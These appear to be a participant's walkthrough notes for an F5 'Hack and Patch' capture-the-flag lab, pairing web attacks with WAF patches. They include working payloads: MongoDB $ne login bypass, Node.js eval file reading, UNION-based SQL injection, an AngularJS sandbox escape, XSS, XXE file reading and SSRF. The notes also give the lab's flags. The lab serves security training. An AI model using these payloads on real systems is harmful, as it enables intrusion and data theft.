f5

1. Hack and Patch
2.  
3. Warning UP :
4.  
5. 1. Hack : F5CTF{9120de7f620ac2bbfff8273918732a2}
6. 2. Patch : F5CTF{8547f194fb98448a89e058e2a1f9d5a1}
7.  
8. Node.js & MongoDB :
9.  
10. 1. Hack MongoDB injection :
11. a. Burp with flag user and flag password
12. b. It is a nodeJS framework, so JSON format
13. i. {"username" : "flag" , "password" : "flag"}
14. c. Bypass authent
15. i. JSON form : {"username" : "flag" , "password" : {“$ne”: "flag"}}
16. ii. HTTP Regular form : username=flag&password[$ne]=flag
17. 2. Patch MongoDB injection :
18. a. On ASM, enable all signatures.
19. b. Check SQLINJ - NoSQL [$ne]
20. 3. Hack Eval is Evil
21. a. Burp and send a calcul for tip$
22. i. POST /api/node/calc
23. ii. {"math":"(120 * 0.15 + 120) / 1"}
24. iii. Console : eval((120 * 0.15 +120) /1)  same result
25. iv. Calculated on server side, so we can use it
26. b. require(‘fs’).readFileSync("/eval/flag")) //
27. i. 2 )) because we need to close the eval, then comments
28. 4. Patch Eval is Evil
29. a. JavaScript Code Injection - require(); (Parameter)
30.  
31. Websockets :
32.  
33. 1. Hack Authentication bypass
34. a. Wss://udf_fqdn
35. i. Wrong URL  go to /admin
36. b. Wss://udf_fqdn/admin
37. i. Logout if needed on application side to delete cookie
38. 2. Patch Authentication bypass
39. a. Create a login page on ASM
40. i. /login
41. ii. Username / password
42. iii. Expected response 302
43. iv. String NOT : /login
44. b. Login enforcement on /admin
45. 3. Hack XSS over Websocket
46. a. Login as admin on browser
47. b. Make an order to test
48. c. <script>alert(Pwned by Dancing Banana)</script>
49. d. Refresh page if needed, re-test
50. e. Inspect element – you can see the script. But not rendered by the browser
51. f. <img src=/ onerror=alert(0xf5)>
52. 4. Patch XSS over Websocket
53. a. On error
54. 5. Hack SQLi over websocket
55. a. Driver, 5th Ave W' order by 1 -- '
56. b. Should still work
57. c. 5th Ave W' order by 6 -- '  still OK, so minimum 6 column
58. d. 5th Ave W' order by 7 -- '  nok, so we have 6 columns
59. e. ‘ union select 1,2,3,4,5,6 from flag -- ‘
60. f. ‘ union select 1,2,3,4,flag,6 from flag -- ‘
61. 6. Patch SQLi over websocket
62. a. Don’t copy past, write the attack line (issue with ‘ and -- )
63.  
64. Plateform based XSS :
65. 1. Hack JS Injection
66. a. Change filter value with something and check source code page
67. b. Close the variable and inject the code
68. i. Filter= matt”; alert(0x123) //
69. ii. Filter= matt”; alert(0xf5) //
70. 2. Patch JS Injection
71. 3. Hack Anguler.js injection
72. a. Go to fake page /matt
73. b. /error?status=404&path=<123> will be escaped.
74. c. /error?status=404&path={{3-1}} we should see 2 in the page
75. d. /error?status=404&path={{1+1}} issue, does not work. Why ?
76. i. http sees + but we need to encode it %2b
77. 4. Hack Angular.js Sandbox bypass
78. a. Google sandbox escape angularjs
79. i. https://portswigger.net/blog/xss-without-html-client-side-template-injection-with-angularjs
80. b. Check Angular version on server side on page attacked source code  v1.4.8
81. c. {{'a'.constructor.prototype.charAt=[].join;$eval('x=1} } };alert(0xf5)//');}}
82. 5. Patch Angular.js Sandbox bypass
83.  
84.  
85. XXE & SSRF:
86.  
87. 1. [Hack] XXE injection
88. a. Contact form is XML – use Burp
89.  
90. Original request
91. <?xml version="1.0" encoding="UTF-8"?>
92. <contact>
93. <name>matt</name>
94. <email>dier@gmail.com</email>
95. <phone>0125632574</phone>
96. <message>fsfgsdfgsdfgsdfgzerezrezrsdfsdfsdfsd</message>
97. </contact>
98.  
99. https://www.owasp.org/index.php/XML_External_Entity_(XXE)_Processing
100.  
101. Attack request
102. <?xml version="1.0" encoding="UTF-8"?>
103. <!DOCTYPE foo [
104. <!ELEMENT foo ANY >
105. <!ENTITY xxe SYSTEM "file:///xxe/flag" >]>
106. <contact>
107. <name>&xxe;</name>
108. <email>dier@gmail.com</email>
109. <phone>0125632574</phone>
110. <message>fsfgsdfgsdfgsdfgzerezrezrsdfsdfsdfsd</message>
111. </contact>
112.  
113. Response with Flag :
114.  
115. 2. [Patch] XXE injection
116. a. No idea how to retrieve the flag. No AJAX blocking page
117. 3. [Hack] SSRF (GET)
118.  
119. <?xml version="1.0" encoding="UTF-8"?>
120. <!DOCTYPE foo [
121. <!ELEMENT foo ANY >
122. <!ENTITY xxe SYSTEM "http://ssrfserver/flag" >]>
123. <contact>
124. <name>&xxe;</name>
125. <email>dier@gmail.com</email>
126. <phone>0125632574</phone>
127. <message>fsfgsdfgsdfgsdfgzerezrezrsdfsdfsdfsd</message>
128. </contact>
129.  
130. a. Tag :
131.  
132. 4. [Patch] SSRF
133. a. No AJAX popup but blocked
134.  
135.  
136.  
137. HTML5 Elements:
138.  
139. 1. [Hack] Media Event Injection
140. a. Go to Services and check the URL. We can change the width (check the source code).
141. b. https://www.w3schools.com/tags/ref_eventattributes.asp
142. c. Element oncanplay interesting to exec something (if user can play )
143. d. Add the element
144.  
145. https://4997985e-a27c-4a62-a057-f51df08baea9.access.udf.f5.com/services?width=100%25 oncanplay=alert(‘F5’)
146.  
147. 2. [Patch] Media Event Injection
148. a. Check Server Techno and signature
149. b. Blocking page but Not able to see the flag. Issue with the Tomer’s JS.
150.  
151. Open Redirect
152.  
153. 1. [Hack] Server Side Redirect
154. a. Click on Admin and change the URL with the redirect
155.  
156. https://4997985e-a27c-4a62-a057-f51df08baea9.access.udf.f5.com/login?path= https://f5.com/labs
157.  
158. b. Login as admin